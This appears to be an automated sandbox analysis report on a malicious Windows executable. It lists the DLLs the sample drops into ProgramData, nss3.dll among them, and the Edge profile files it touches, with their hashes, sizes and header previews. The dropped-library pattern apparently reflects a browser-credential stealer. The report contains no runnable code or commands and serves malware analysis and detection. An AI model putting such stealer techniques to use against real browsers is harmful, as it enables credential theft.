Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: s6QYhBcJtc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: UTsIm2Lewa.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1031eca0-63a4-4048-9fc0-6038dc1209ab.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57709
Entropy (8bit):	6.103891556820183
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yOIuPGWv/sxtwJj7VLyMV/YoskFoz:z/0+zI7yOtv/4KJVeZoskG
MD5:	435D38FB475AB925F36879D9064410B7
SHA1:	B5B54840A28CADF71FDBC59CA09C53425A906550
SHA-256:	4D68E020C3A665DF5D3421358B5E17D18938B04503963CE2DE31F7B8162F8C15
SHA-512:	4F896767F6CD54C24FF381E10255CEC9475CF672F8002D5B2539A5D93BD1440CCA71B534C560E45FE2B9FC1918893FB6A0DB5420889CDA3F53B1464CF2D85892
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\14e750eb-0889-4945-b4f1-598b0f748798.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	59247
Entropy (8bit):	6.100469590401056
Encrypted:	false
SSDEEP:	1536:TMk1rT8HbnUmPGWv/sxtwJUoEzuTFo17VLyMV/Yosa:TMYrT875v/4KGo9h2VeZosa
MD5:	8BFFD7E478CD36314BD6EE59AE412F49
SHA1:	31EE61A87C4A8D3690A212D5BAEE2726E98C905C
SHA-256:	3E3D7E0924A13ADDA4166F9C4D4C119F5E0D701F2319586DBF2A20DEE9BE7BE1
SHA-512:	CEA35EF9EBC4B7DBFD5A635B482955DCC8FFF6A38597C17E9DB513CB976787EA1452C3FB6F59E4C0EDF1734FD0A0940B4440E53A453FCE9227DB25C8185C78B4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"288ad005-e8dd-423a-954b-570f8390b883"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\17037f54-5a06-4317-9ef8-09c4adf934e3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	57631
Entropy (8bit):	6.103615908752775
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynF3PGWv/sxtw5j7VLyMV/YoskFoz:z/0+zI7ynJv/4K5VeZoskG
MD5:	9BAB7492168D1358A4B530F08093D7C8
SHA1:	15FF7AE71436E79B2E8B58A3ABD3B5E76C97D91E
SHA-256:	EA9BBAD8F967EA62203C6FAC3A1B1FCF3F8080EBC51A6B9D750B4ED486C569F3
SHA-512:	AE0A271264543ED65F71F342B7128F4F74C173450836F3D8E65132F42B35B1F39E024EE5701B9F468C5228C99CC3E47916728992F1B9B74C92EF91F1DA188664
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2d0d2135-6b06-4ede-b40f-2c1ad0660a33.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59123
Entropy (8bit):	6.100577220289864
Encrypted:	false
SSDEEP:	1536:TMk1rT8HRasuPGWv/sxtwJUoEzuTFo17VLyMV/Yosa:TMYrT8xIv/4KGo9h2VeZosa
MD5:	F931802D334C740DC00AF38C7D124513
SHA1:	3BDAF2118591EAE455DC67FC0C120A275089822E
SHA-256:	67363524B8390C2F0649CE7ADAE7ADDDEAF910E113BAA4AE8641E0887FD7E722
SHA-512:	5C7E9EB259F456FD3A353C98E474FAAD055A97716FBE4AF415979DA51892209C6BCEEC742C4BCDDD912C827BF6E159B05088A557C2913E05B1D7109C5D12C4D4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"288ad005-e8dd-423a-954b-570f8390b883"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\79e3230a-556b-4546-9452-eedfa4820519.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59247
Entropy (8bit):	6.10046910522288
Encrypted:	false
SSDEEP:	1536:TMk1rT8HbaUmPGWv/sxtwJUoEzuTFo17VLyMV/Yosa:TMYrT872v/4KGo9h2VeZosa
MD5:	2751B6E8C733352A374F8A082598A64A
SHA1:	7E825DD43F3731EB65617A0D95ED8722F5A4FCFF
SHA-256:	E1F5291D83DF6872A0E8B7F93A2E155DE5F560041A2D570463E92C224EB4AE59
SHA-512:	90349B3780D4AED9610BABEE50C1AC310AA37B709263C5B103624F96F1F93187F6E7DD0048C030C27B13AA0533C5AE1AA89F3E7A1EFC25D3A9233F54717D75D0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"288ad005-e8dd-423a-954b-570f8390b883"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7e2179c1-38c5-43aa-9ad4-546a2885d048.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	57631
Entropy (8bit):	6.103615908752775
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynF3PGWv/sxtw5j7VLyMV/YoskFoz:z/0+zI7ynJv/4K5VeZoskG
MD5:	9BAB7492168D1358A4B530F08093D7C8
SHA1:	15FF7AE71436E79B2E8B58A3ABD3B5E76C97D91E
SHA-256:	EA9BBAD8F967EA62203C6FAC3A1B1FCF3F8080EBC51A6B9D750B4ED486C569F3
SHA-512:	AE0A271264543ED65F71F342B7128F4F74C173450836F3D8E65132F42B35B1F39E024EE5701B9F468C5228C99CC3E47916728992F1B9B74C92EF91F1DA188664
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\4db18e27-c163-4577-8ca7-55942e028a50.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640139822627159
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7o:fwUQC5VwBIiElEd2K57P7o
MD5:	3F661497580210A9A5B194DBDE387CBD
SHA1:	AC5DA82539FDF967C0D29284446BBF33C1023DE3
SHA-256:	8615001DB8EA389D4FF271071160DD5F17A56A2FF6412C3D0A77531FBA8234C1
SHA-512:	8B7CE599B9C5A232BBB45152B5FE7850C2A7161EE914B04A63EDB0EF313D6C5A53962614F664908518B630D97F84C0EA5FED4CC0404D10EF9E5B6D58AB037437
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640139822627159
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7o:fwUQC5VwBIiElEd2K57P7o
MD5:	3F661497580210A9A5B194DBDE387CBD
SHA1:	AC5DA82539FDF967C0D29284446BBF33C1023DE3
SHA-256:	8615001DB8EA389D4FF271071160DD5F17A56A2FF6412C3D0A77531FBA8234C1
SHA-512:	8B7CE599B9C5A232BBB45152B5FE7850C2A7161EE914B04A63EDB0EF313D6C5A53962614F664908518B630D97F84C0EA5FED4CC0404D10EF9E5B6D58AB037437
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-672EBF2A-1F40.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04758934091958943
Encrypted:	false
SSDEEP:	192:pa/0m5tmTnOAUJY5J/7qiRDs0JVFg8XWMIFhkHsBwwhWhNYv+RQ8TfWSFqn8y08s:M/0UtQXF6dfhO8mvfFq08T2RGOD
MD5:	A1078B6B08A9B639386FF48474038085
SHA1:	A2CA051AEB58EA7B2019A9F691FA9E5A3F7D3699
SHA-256:	E87F9D83CCCC0BAE9E9EFD995577C537B904FFAED0B2BADEE7384756EC68DA59
SHA-512:	02B818EF8E72BE07E5B5593DC5E8A49AD20C186D083ACD46271C2D0D991E05906F3A1401E0C16850AE0CD03483DB4A09A1A4354C7C07BFA6682D08C93B687B36
Malicious:	false
Preview:	...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".qnktbu20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2..........~.

